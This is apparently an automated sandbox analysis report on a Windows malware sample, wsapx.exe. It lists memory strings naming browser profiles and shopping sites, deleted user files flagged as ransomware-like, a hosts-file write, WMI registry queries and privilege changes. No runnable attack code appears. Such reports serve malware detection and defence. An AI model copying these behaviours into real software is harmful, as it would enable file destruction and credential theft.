Source: wsapx.exe, 00000002.00000003.2181812826.000001C879A50000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2183214516.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2181812826.000001C879A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: wsapx.exe, 00000002.00000003.2420350935.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C8798CB000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879E7C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: wsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: wsapx.exe, 00000002.00000002.2655646494.000001C87A2A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A5A8000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: wsapx.exe, 00000002.00000003.2352327129.000001C87AA7F000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2332910411.000001C87AA7F000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: wsapx.exe, 00000002.00000003.2342123848.000001C879EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org#
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/
Source: wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A093000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C87A05F000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A063000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B248000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2667660778.00007FFD93D99000.00000004.00000001.01000000.0000000A.sdmp, wsapx.exe, 00000002.00000002.2670016221.00007FFDA33D8000.00000004.00000001.01000000.00000011.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: wsapx.exe, 00000002.00000002.2651928878.000001C8794D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: wsapx.exe, 00000002.00000002.2667746115.00007FFD942D2000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: wsapx.exe, 00000002.00000002.2654490430.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421963487.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2370327129.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\wsapx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\GAOBCVIQIJ.pdf	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\EOWRVPQCCS.mp3	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\BNAGMGSPLO.pdf	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\BNAGMGSPLO.pdf	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\QCFWYSKMHA.png	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\wsapx.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: cmd.exe

Process created: 64

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe

Code function: 110_2_00007FF60E5E3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,

110_2_00007FF60E5E3A70

Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe

Code function: 110_2_00007FF60E60B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

110_2_00007FF60E60B57C

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71B1000	0_2_00007FF7C71B1000
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71B8BD0	0_2_00007FF7C71B8BD0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D0938	0_2_00007FF7C71D0938
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D69D4	0_2_00007FF7C71D69D4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71B9870	0_2_00007FF7C71B9870
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D18E4	0_2_00007FF7C71D18E4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71CDF60	0_2_00007FF7C71CDF60
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C1FD0	0_2_00007FF7C71C1FD0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D9798	0_2_00007FF7C71D9798
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C17B0	0_2_00007FF7C71C17B0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C8804	0_2_00007FF7C71C8804
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C9F10	0_2_00007FF7C71C9F10
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D5EEC	0_2_00007FF7C71D5EEC
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71BAD1D	0_2_00007FF7C71BAD1D
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C1DC4	0_2_00007FF7C71C1DC4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C5DA0	0_2_00007FF7C71C5DA0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C3610	0_2_00007FF7C71C3610
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71CE5E0	0_2_00007FF7C71CE5E0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C2C80	0_2_00007FF7C71C2C80
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D3C80	0_2_00007FF7C71D3C80
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D0938	0_2_00007FF7C71D0938
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D6488	0_2_00007FF7C71D6488
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D5C70	0_2_00007FF7C71D5C70
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71BA4E4	0_2_00007FF7C71BA4E4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71BA34B	0_2_00007FF7C71BA34B
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C1BC0	0_2_00007FF7C71C1BC0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71CDACC	0_2_00007FF7C71CDACC
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C8154	0_2_00007FF7C71C8154
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D411C	0_2_00007FF7C71D411C
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C21D4	0_2_00007FF7C71C21D4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C19B4	0_2_00007FF7C71C19B4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71C3A14	0_2_00007FF7C71C3A14
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71B1000	2_2_00007FF7C71B1000
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D69D4	2_2_00007FF7C71D69D4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71B9870	2_2_00007FF7C71B9870
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D18E4	2_2_00007FF7C71D18E4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71CDF60	2_2_00007FF7C71CDF60
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C1FD0	2_2_00007FF7C71C1FD0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D9798	2_2_00007FF7C71D9798
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C17B0	2_2_00007FF7C71C17B0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C8804	2_2_00007FF7C71C8804
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C9F10	2_2_00007FF7C71C9F10
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D5EEC	2_2_00007FF7C71D5EEC
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71BAD1D	2_2_00007FF7C71BAD1D
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C1DC4	2_2_00007FF7C71C1DC4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C5DA0	2_2_00007FF7C71C5DA0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C3610	2_2_00007FF7C71C3610
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71CE5E0	2_2_00007FF7C71CE5E0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C2C80	2_2_00007FF7C71C2C80
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D3C80	2_2_00007FF7C71D3C80
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D0938	2_2_00007FF7C71D0938
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D6488	2_2_00007FF7C71D6488
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D5C70	2_2_00007FF7C71D5C70
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71BA4E4	2_2_00007FF7C71BA4E4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71BA34B	2_2_00007FF7C71BA34B
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C1BC0	2_2_00007FF7C71C1BC0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71B8BD0	2_2_00007FF7C71B8BD0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71CDACC	2_2_00007FF7C71CDACC
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D0938	2_2_00007FF7C71D0938
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C8154	2_2_00007FF7C71C8154
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D411C	2_2_00007FF7C71D411C
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C21D4	2_2_00007FF7C71C21D4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C19B4	2_2_00007FF7C71C19B4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71C3A14	2_2_00007FF7C71C3A14
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD93D97B30	2_2_00007FFD93D97B30
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94491000	2_2_00007FFD94491000
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD946218A0	2_2_00007FFD946218A0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD946212F0	2_2_00007FFD946212F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947C1850	2_2_00007FFD947C1850
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94758290	2_2_00007FFD94758290
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94758CF0	2_2_00007FFD94758CF0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94760A50	2_2_00007FFD94760A50
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947B9A70	2_2_00007FFD947B9A70
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947A94F0	2_2_00007FFD947A94F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9478E4F0	2_2_00007FFD9478E4F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94749480	2_2_00007FFD94749480
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9476B490	2_2_00007FFD9476B490
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947525F0	2_2_00007FFD947525F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94774610	2_2_00007FFD94774610
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9476F570	2_2_00007FFD9476F570
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9478D700	2_2_00007FFD9478D700
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9476C720	2_2_00007FFD9476C720
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9479D6A0	2_2_00007FFD9479D6A0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9477A6B5	2_2_00007FFD9477A6B5
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947D46C0	2_2_00007FFD947D46C0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947FF840	2_2_00007FFD947FF840
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94742850	2_2_00007FFD94742850
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94755850	2_2_00007FFD94755850
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947A8770	2_2_00007FFD947A8770
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947987A0	2_2_00007FFD947987A0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947440F0	2_2_00007FFD947440F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94751120	2_2_00007FFD94751120
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947570C0	2_2_00007FFD947570C0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947A40D0	2_2_00007FFD947A40D0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947E1250	2_2_00007FFD947E1250
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9475C1C0	2_2_00007FFD9475C1C0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9475B310	2_2_00007FFD9475B310
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947B4310	2_2_00007FFD947B4310
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947662C0	2_2_00007FFD947662C0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947652D0	2_2_00007FFD947652D0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9476D3F0	2_2_00007FFD9476D3F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947C73F0	2_2_00007FFD947C73F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94746400	2_2_00007FFD94746400
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947EE430	2_2_00007FFD947EE430
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947C8430	2_2_00007FFD947C8430
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947AF360	2_2_00007FFD947AF360
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94783370	2_2_00007FFD94783370
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94744390	2_2_00007FFD94744390
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94762D20	2_2_00007FFD94762D20
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94746D42	2_2_00007FFD94746D42
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94767C90	2_2_00007FFD94767C90
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94743CA0	2_2_00007FFD94743CA0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94799CD0	2_2_00007FFD94799CD0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94798DF0	2_2_00007FFD94798DF0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94787E10	2_2_00007FFD94787E10
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9474FD60	2_2_00007FFD9474FD60
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD94748F10	2_2_00007FFD94748F10
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD9476BF40	2_2_00007FFD9476BF40
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FFD947ADE70	2_2_00007FFD947ADE70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32435B68	11_2_00007FFD32435B68
